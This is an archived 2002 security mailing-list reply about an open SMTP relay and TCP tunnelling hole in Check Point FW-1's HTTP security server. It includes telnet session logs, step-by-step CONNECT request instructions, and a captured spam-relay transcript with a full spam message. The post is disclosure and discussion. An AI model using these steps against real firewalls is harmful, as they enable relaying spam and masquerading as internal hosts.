Re: UPDATE: [wcolburnat_private: SMTP relay through checkpoint firewall]

From: Dennis Henderson (hendoat_private)
Date: Tue Feb 19 2002 - 18:32:19 PST

  • Next message: David F. Skoll: "RE: Non existing attachments, more info"

    William,
    
    I was only partially able to reproduce your issue and it was only to
    destinations and services that my firewall would have already allowed
    anyway.
    
    
    root@mojo:~# telnet www.xxx.com 80
    Trying 19x.1x8.xx6.1x3...
    Connected to www.xxx.com.
    Escape character is '^]'.
    CONNECT 1x8.1x6.xx1.1x6:25 / HTTP/1.0
    HTTP/1.0 200
    220 ESMTP
    helo firewall
    250 mail.xxx.com Hello [1x8.1x6.xx1.1x5], pleased to meet you
    quit
    221 2.0.0 mail.xxx.com closing connection
    Connection closed by foreign host.
    
    Any other connection attempt to a IP:port that was not normally allowed by
    policy was denied.
    
    root@mojo:~# telnet www.xxx.com 80
    Trying 19x.1x8.xx6.1x3...
    Connected to www.xxx.com.
    Escape character is '^]'.
    CONNECT 1x8.1x6.xx1.1x6:22 / HTTP/1.0
    HTTP/1.0 200
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: text/html
    Content-Length: 85
    <TITLE>Error</TITLE>
    <BODY>
    <H1>Error</H1>
    FW-1 at xxxexmfwx: Access denied.</BODY>
    Connection closed by foreign host.
    
    While it is a little startling that Checkpoint would allow this kind of
    connection, I was not able to actually connect to any place that I would not
    normally be able to connect from the internet. I do not allow http
    tunneling. We are running the http security server strictly to block the
    nimda and code red attacks.
    
    I am running 4.1 Sp5
    
    Regards
    
    Dennis
    
    
    
    
    ----- Original Message -----
    From: "William D. Colburn (aka Schlake)" <wcolburnat_private>
    To: <bugtraqat_private>; "Dan Lunceford" <danat_private>; "Ryan"
    <ryanat_private>; <supportat_private>
    Cc: "Madeline Navarrette" <mnavarreat_private>
    Sent: Monday, February 18, 2002 6:09 PM
    Subject: UPDATE: [wcolburnat_private: SMTP relay through checkpoint firewall]
    
    
    > Checkpoint bounced my mail because I'm not a checkpoint customer, so I
    > contacted customer advocacy and resent it to a different address (this
    > message is copied to her as well).  I was told that the issue would be
    > propogated to an appropriate person.
    >
    > Please drop the old message and continue to hold this message until
    > Checkpoint responds.
    >
    > I have a few updates to this issue that I have learned since I crafted
    > the original message.
    >
    > I only need to give the "CONNECT" line, and nothing else.  After the
    > second newline there is a pause and then the TCP stream is open.  I seem
    > to be able to open any port on any machine I want *except* port 80.  I
    > was able to telnet in to UNIX login with the firewall appearing as the
    > remote host.  The initial machine I use (inside the firewall) does not
    > need to actually exist, I merely have to attempt to connect to an IP
    > address "inside" on port 80.
    >
    > This whole give anyone outside a firewall the ability to masquerade on
    > any TCP service (except WWW) as a machine inside the domain of the
    > firewall.  As far as I can tell there are no logs on this, and it is
    > hard to detect on the firewall.  I found it by doing a tcpdump of all
    > packets and gradually narrowing down my filters until I was able to
    > "catch" an entire transaction.
    >
    > ----- Forwarded message from "William D. Colburn (aka Schlake)"
    <wcolburnat_private> -----
    >
    > Step one: telnet to a machine behind the checkpoint firewall on port 80
    >
    > Step two: Type the following:
    > >CONNECT mailserver.somecompany.com:25 / HTTP/1.0
    > >User-Agent: eeep
    > >Cache-Control: private,no-cache
    > >Pragma: no-cache
    > >
    >
    > Step three: wait a moment for your SMTP banner to pop up.
    >
    > I will attach an actual attack I caputured with tcpdump and ethereal.
    > The file is the result of an ethereal "Follow TCP stream".
    >
    > I hate the person who did this to me and I hope they die a terrible
    > death.
    >
    > --
    > William Colburn, "Sysprog" <wcolburnat_private>
    > Computer Center, New Mexico Institute of Mining and Technology
    > http://www.nmt.edu/tcc/     http://www.nmt.edu/~wcolburn
    >
    > --AqsLC8rIMeq19msA
    > Content-Type: text/plain; charset=us-ascii
    > Content-Disposition: attachment; filename=checkpoint
    >
    > From rootat_private  Mon Feb 18 16:05:43 2002
    > Return-Path: <rootat_private>
    > Received: from netpeep.nmt.edu (netpeep.nmt.edu [129.138.250.10])
    > by mailhost.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hF0009872
    > for <schlakeat_private>; Mon, 18 Feb 2002 16:05:43 -0700
    > Received: from netpeep.nmt.edu (localhost [127.0.0.1])
    > by netpeep.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hnA020585
    > for <schlakeat_private>; Mon, 18 Feb 2002 16:05:43 -0700
    > Received: (from root@localhost)
    > by netpeep.nmt.edu (8.12.2/8.12.1/Submit) id g1IN5h8w020584
    > for schlakeat_private; Mon, 18 Feb 2002 16:05:43 -0700
    > Date: Mon, 18 Feb 2002 16:05:43 -0700
    > From: root <rootat_private>
    > Message-Id: <200202182305.g1IN5h8w020584at_private>
    > To: schlakeat_private
    > Content-Length: 3580
    > Lines: 112
    >
    > CONNECT mail2.freeuk.net:25 / HTTP/1.0
    > User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    > Cache-Control: private,no-cache
    > Pragma: no-cache
    >
    > HELO hotmail.com
    > MAIL FROM: <pheros680506at_private>
    > RCPT TO: <renewinterat_private>
    > RCPT TO: <renewuat_private>
    > RCPT TO: <renfahat_private>
    > RCPT TO: <renfi11160at_private>
    > RCPT TO: <renfield13at_private>
    > RCPT TO: <renfield20at_private>
    > RCPT TO: <renfield94at_private>
    > RCPT TO: <renfrewat_private>
    > RCPT TO: <renfro33at_private>
    > RCPT TO: <reng3at_private>
    > RCPT TO: <rengaat_private>
    > RCPT TO: <rengel293at_private>
    > RCPT TO: <rengel7495at_private>
    > RCPT TO: <rengelh946at_private>
    > RCPT TO: <rengersat_private>
    > RCPT TO: <rengisedat_private>
    > RCPT TO: <rengl21068at_private>
    > RCPT TO: <rengl29048at_private>
    > RCPT TO: <rengl78818at_private>
    > DATA
    > Reply-To: <pheros680506at_private>
    > Message-ID: <004b71e11dcb$7144b8d2$6ac55bc3@mlpqff>
    > From: <pheros680506at_private>
    > To: <renewinterat_private>
    > Cc: <renewuat_private>,
    > <renfahat_private>,
    > <renfi11160at_private>,
    > <renfield13at_private>,
    > <renfield20at_private>,
    > <renfield94at_private>,
    > <renfrewat_private>,
    > <renfro33at_private>,
    > <reng3at_private>,
    > <rengaat_private>,
    > <rengel293at_private>,
    > <rengel7495at_private>,
    > <rengelh946at_private>,
    > <rengersat_private>,
    > <rengisedat_private>,
    > <rengl21068at_private>,
    > <rengl29048at_private>,
    > <rengl78818at_private>
    > Subject: A new fragrance
    (3437AlLf5-384bbsO4815hPeX5-01@27)
    > MiME-Version: 1.0
    > Content-Type: text/html; charset="iso-8859-1"
    > X-Priority: 3 (Normal)
    > X-MSMail-Priority: Normal
    > X-Mailer:
    > Importance: Normal
    >
    > Hi !
    >
    > <HTML>
    > <head><title>Pheros attraction</title>
    > </head>
    > <BODY TEXT="#000000" LINK="#000000" VLINK="#000000" BGCOLOR="#7777FF">
    > <CENTER>
    > <TABLE WIDTH="650">
    > <TR>
    > <TD COLSPAN="2">
    > <FONT FACE="VERDANA, ARIAL">Notice: I have paid to be able to send you
    this e-mail.  I do not intend to
    > cause you harm, fill up your mailbox or bother you needlessly.  I am only
    > trying to reach those who are not as secure in their financial future as I
    > was when I first started looking for a way to earn money online.  To be
    > removed, please go to the end of this e-mail. Please forgive me if you
    > receive this advertisement twice.<BR><BR>
    > </FONT>
    > </TD>
    > </TR>
    > <TR>
    > <TD VALIGN="TOP">
    > <FONT FACE="VERDANA, ARIAL">
    > Pheros is a lovely fragrance with a touch of human
    >    pheromones, packaged in a exclusive crafted box.
    >   Pheros is a foolproof tool of seduction, the scent and the
    >    pheromones together make a foolproof combination.
    >  No one can resist the wearer of this mysterious fragrance!
    >   Pheros combines high tech science with the well-known
    >      function of the scent of a luxorious perfume. <BR> The price is 19.95
    USD/Bottle, including P&P! Payment is done via PayPal!
    > <BR>To order, klick the Paypal logo <A
    HREF="https://www.paypal.com/xclick/business=pheros3%40hotmail.com&item_name
    =Pheros&item_number=PherInt001&amount=19.95" TARGET="new"><IMG
    SRC="http://images.paypal.com/images/x-click-but02.gif" border="0"></A>
    > <BR>
    >
    > </FONT>
    > </TD>
    > <TD>
    > <IMG SRC="http://pheros.freehosting.net/images/Mailbilden.jpg" border="2">
    > </TD>
    > </TR>
    > <TR>
    > <TD COLSPAN="2">
    > <BR>
    > <FONT FACE="Verdana, Arial">
    > To be removed from this mailing list, please reply to this message with
    the subjct "remove".
    > You will be BLOCKED from all mail from this site and your request will
    take effect within 24 hours.
    > </FONT>
    > </TD>
    > </TR>
    > </TABLE>
    > </CENTER>
    > </BODY>
    > </HTML>
    >
    [2901sDxs3-632TivA4099LrRl6-563cNjc6630cqwk8-434lwqh9794mwMr2-514eMAy1216cuz
    @71]
    >
    > .
    > QUIT
    >
    >
    > --AqsLC8rIMeq19msA--
    >
    > ----- End forwarded message -----
    >
    > --
    > William Colburn, "Sysprog" <wcolburnat_private>
    > Computer Center, New Mexico Institute of Mining and Technology
    > http://www.nmt.edu/tcc/     http://www.nmt.edu/~wcolburn
    >
    



    This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 18:47:35 PST